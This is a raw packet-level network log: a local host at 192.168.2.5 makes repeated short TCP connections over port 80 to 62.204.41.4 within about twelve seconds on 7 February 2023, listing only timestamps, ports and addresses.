Feb 7, 2023 19:57:37.382478952 CET	80	49824	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.384447098 CET	49824	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.493974924 CET	49824	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.494731903 CET	49825	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.553495884 CET	80	49824	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.553591967 CET	49824	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.556618929 CET	80	49825	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.556761980 CET	49825	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.561460018 CET	49825	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.623166084 CET	80	49825	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.627032042 CET	80	49825	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.627126932 CET	49825	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.780802965 CET	49825	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.781783104 CET	49826	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.843161106 CET	80	49825	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.843226910 CET	49825	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.844427109 CET	80	49826	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.844548941 CET	49826	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.847264051 CET	49826	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.910290003 CET	80	49826	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.912981033 CET	80	49826	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.913105011 CET	49826	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.024707079 CET	49826	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.025405884 CET	49827	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.086167097 CET	80	49827	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.086308956 CET	49827	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.087176085 CET	80	49826	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.087271929 CET	49826	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.087800026 CET	49827	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.148442030 CET	80	49827	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.152734041 CET	80	49827	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.152883053 CET	49827	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.260277033 CET	49828	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.260293007 CET	49827	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.320919037 CET	80	49827	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.321268082 CET	49827	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.322875977 CET	80	49828	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.323008060 CET	49828	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.323715925 CET	49828	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.386121988 CET	80	49828	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.388828039 CET	80	49828	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.394562006 CET	49828	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.523685932 CET	49828	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.524630070 CET	49829	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.584981918 CET	80	49829	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.585218906 CET	49829	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.585639954 CET	49829	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.586175919 CET	80	49828	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.588738918 CET	49828	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.645859957 CET	80	49829	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.651691914 CET	80	49829	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.652751923 CET	49829	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.768771887 CET	49829	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.769716978 CET	49830	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.829199076 CET	80	49829	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.830027103 CET	80	49830	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.830241919 CET	49829	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.830302000 CET	49830	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.830730915 CET	49830	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:38.891366959 CET	80	49830	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.897277117 CET	80	49830	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:38.897464037 CET	49830	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.008785009 CET	49830	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.010200977 CET	49831	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.069811106 CET	80	49830	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.070360899 CET	80	49831	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.070518970 CET	49830	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.070559025 CET	49831	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.071347952 CET	49831	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.132282972 CET	80	49831	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.137352943 CET	80	49831	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.137558937 CET	49831	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.243331909 CET	49831	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.244529009 CET	49832	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.303956985 CET	80	49831	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.304177046 CET	49831	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.305037022 CET	80	49832	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.305216074 CET	49832	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.308335066 CET	49832	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.369204998 CET	80	49832	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.373730898 CET	80	49832	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.373918056 CET	49832	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.479274035 CET	49832	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.480237961 CET	49833	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.539829016 CET	80	49832	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.540024996 CET	49832	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.542712927 CET	80	49833	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.542994976 CET	49833	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.543462992 CET	49833	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.605923891 CET	80	49833	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.610179901 CET	80	49833	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.610366106 CET	49833	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.712613106 CET	49833	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.713766098 CET	49834	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.774247885 CET	80	49834	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.774452925 CET	49834	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.774939060 CET	49834	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.775125027 CET	80	49833	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.775226116 CET	49833	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.835295916 CET	80	49834	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.839162111 CET	80	49834	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:39.839313984 CET	49834	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.964976072 CET	49834	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:39.965859890 CET	49835	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.025333881 CET	80	49834	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.025460958 CET	49834	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.026272058 CET	80	49835	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.026360989 CET	49835	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.026952028 CET	49835	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.087023973 CET	80	49835	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.092897892 CET	80	49835	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.093133926 CET	49835	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.205207109 CET	49835	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.206060886 CET	49836	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.265521049 CET	80	49835	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.265686035 CET	49835	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.267553091 CET	80	49836	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.267730951 CET	49836	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.268244028 CET	49836	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.329953909 CET	80	49836	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.333790064 CET	80	49836	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.333947897 CET	49836	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.447798014 CET	49836	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.448887110 CET	49837	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.508960009 CET	80	49837	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.509119987 CET	49837	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.510201931 CET	80	49836	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.510294914 CET	49836	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.510394096 CET	49837	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.570048094 CET	80	49837	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.574373007 CET	80	49837	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.574444056 CET	49837	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.681425095 CET	49837	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.682260036 CET	49838	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.741172075 CET	80	49837	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.741297960 CET	49837	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.743920088 CET	80	49838	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.744077921 CET	49838	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.748972893 CET	49838	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.810667992 CET	80	49838	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.813787937 CET	80	49838	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:40.814605951 CET	49838	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.942975044 CET	49838	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:40.943675995 CET	49839	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.004530907 CET	80	49838	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.004595041 CET	49838	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.005012035 CET	80	49839	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.005094051 CET	49839	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.005569935 CET	49839	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.066972971 CET	80	49839	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.072668076 CET	80	49839	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.072765112 CET	49839	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.180352926 CET	49839	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.181454897 CET	49840	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.242826939 CET	80	49839	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.243310928 CET	49839	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.243515015 CET	80	49840	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.243638992 CET	49840	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.244153023 CET	49840	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.306523085 CET	80	49840	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.309442043 CET	80	49840	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.310637951 CET	49840	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.415045023 CET	49840	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.416136980 CET	49841	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.476661921 CET	80	49840	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.478511095 CET	80	49841	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.478724957 CET	49840	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.478759050 CET	49841	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.479214907 CET	49841	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.541680098 CET	80	49841	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.545325994 CET	80	49841	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.545536041 CET	49841	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.649573088 CET	49841	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.650572062 CET	49842	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.713001013 CET	80	49842	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.713042021 CET	80	49841	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.713305950 CET	49842	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.713305950 CET	49841	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.717333078 CET	49842	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.777973890 CET	80	49842	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.781707048 CET	80	49842	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.786798000 CET	49842	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.899904966 CET	49842	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.900805950 CET	49843	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.962851048 CET	80	49842	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.965564966 CET	80	49843	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:41.965636969 CET	49842	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.965723991 CET	49843	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:41.966114998 CET	49843	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.030330896 CET	80	49843	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.031290054 CET	80	49843	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.034847975 CET	49843	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.152733088 CET	49843	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.153444052 CET	49844	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.213906050 CET	80	49844	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.214910984 CET	49844	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.215375900 CET	49844	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.215470076 CET	80	49843	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.217935085 CET	49843	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.277951002 CET	80	49844	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.280846119 CET	80	49844	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.281017065 CET	49844	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.392393112 CET	49844	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.393357038 CET	49845	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.454902887 CET	80	49845	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.454953909 CET	80	49844	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.455202103 CET	49844	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.455704927 CET	49845	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.455704927 CET	49845	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.515989065 CET	80	49845	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.518126011 CET	80	49845	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.518347979 CET	49845	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.634812117 CET	49845	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.635907888 CET	49846	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.694881916 CET	80	49845	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.695099115 CET	49845	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.696336031 CET	80	49846	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.696513891 CET	49846	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.696964979 CET	49846	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.756520987 CET	80	49846	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.759289026 CET	80	49846	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:42.759363890 CET	49846	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:42.991553068 CET	49846	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.052593946 CET	80	49846	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.052792072 CET	49846	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.220691919 CET	49847	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.280249119 CET	80	49847	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.280474901 CET	49847	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.302253962 CET	49847	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.361558914 CET	80	49847	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.365643024 CET	80	49847	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.365760088 CET	49847	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.530762911 CET	49847	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.531722069 CET	49848	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.590245008 CET	80	49847	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.590440989 CET	49847	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.594325066 CET	80	49848	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.594516993 CET	49848	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.671761990 CET	49848	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.735249043 CET	80	49848	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.736843109 CET	80	49848	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.737035036 CET	49848	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.882440090 CET	49848	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.889779091 CET	49849	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.945111990 CET	80	49848	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.945305109 CET	49848	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.951662064 CET	80	49849	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:43.951854944 CET	49849	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:43.984219074 CET	49849	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.046041012 CET	80	49849	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:44.050056934 CET	80	49849	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:44.050226927 CET	49849	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.241519928 CET	49849	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.242621899 CET	49850	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.305536985 CET	80	49849	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:44.305578947 CET	80	49850	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:44.305720091 CET	49849	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.305785894 CET	49850	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.320306063 CET	49850	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:44.382045031 CET	80	49850	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:44.384305000 CET	80	49850	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:44.384476900 CET	49850	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.410032034 CET	49850	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.410897970 CET	49851	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.471779108 CET	80	49850	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:45.471971035 CET	49850	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.473217010 CET	80	49851	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:45.473366022 CET	49851	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.497081995 CET	49851	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.559539080 CET	80	49851	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:45.563458920 CET	80	49851	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:45.563641071 CET	49851	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.742459059 CET	49851	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.748945951 CET	49852	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.805041075 CET	80	49851	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:45.805207014 CET	49851	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:45.809711933 CET	80	49852	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:45.809875965 CET	49852	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:46.015162945 CET	49852	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:46.076088905 CET	80	49852	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:46.079853058 CET	80	49852	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:46.080022097 CET	49852	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:47.716224909 CET	49852	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:47.716898918 CET	49853	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:47.777219057 CET	80	49852	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:47.777416945 CET	49852	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:47.778228998 CET	80	49853	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:47.778364897 CET	49853	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:47.844021082 CET	49853	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:47.906260967 CET	80	49853	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:47.910370111 CET	80	49853	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:47.910542011 CET	49853	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.063591003 CET	49853	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.064487934 CET	49854	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.125049114 CET	80	49854	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.125168085 CET	80	49853	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.125319958 CET	49854	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.125363111 CET	49853	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.147586107 CET	49854	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.208154917 CET	80	49854	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.211539030 CET	80	49854	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.211678982 CET	49854	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.338968039 CET	49854	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.339845896 CET	49855	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.399625063 CET	80	49854	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.399723053 CET	49854	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.402259111 CET	80	49855	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.402431011 CET	49855	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.404553890 CET	49855	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.466958046 CET	80	49855	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.469326973 CET	80	49855	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.469501972 CET	49855	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.571732044 CET	49855	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.572628975 CET	49856	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.633197069 CET	80	49856	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.633378029 CET	49856	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.633799076 CET	49856	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.634051085 CET	80	49855	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.634159088 CET	49855	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.694191933 CET	80	49856	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.696414948 CET	80	49856	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.696513891 CET	49856	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.807684898 CET	49856	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.809290886 CET	49857	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.868309021 CET	80	49856	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.868458033 CET	49856	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.870851994 CET	80	49857	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.871000051 CET	49857	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.874537945 CET	49857	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:48.936194897 CET	80	49857	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.938997984 CET	80	49857	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:48.939131975 CET	49857	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.044655085 CET	49857	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.045926094 CET	49858	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.107817888 CET	80	49857	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.108047009 CET	49857	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.108530998 CET	80	49858	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.108666897 CET	49858	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.109184980 CET	49858	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.172322989 CET	80	49858	62.204.41.4	192.168.2.5
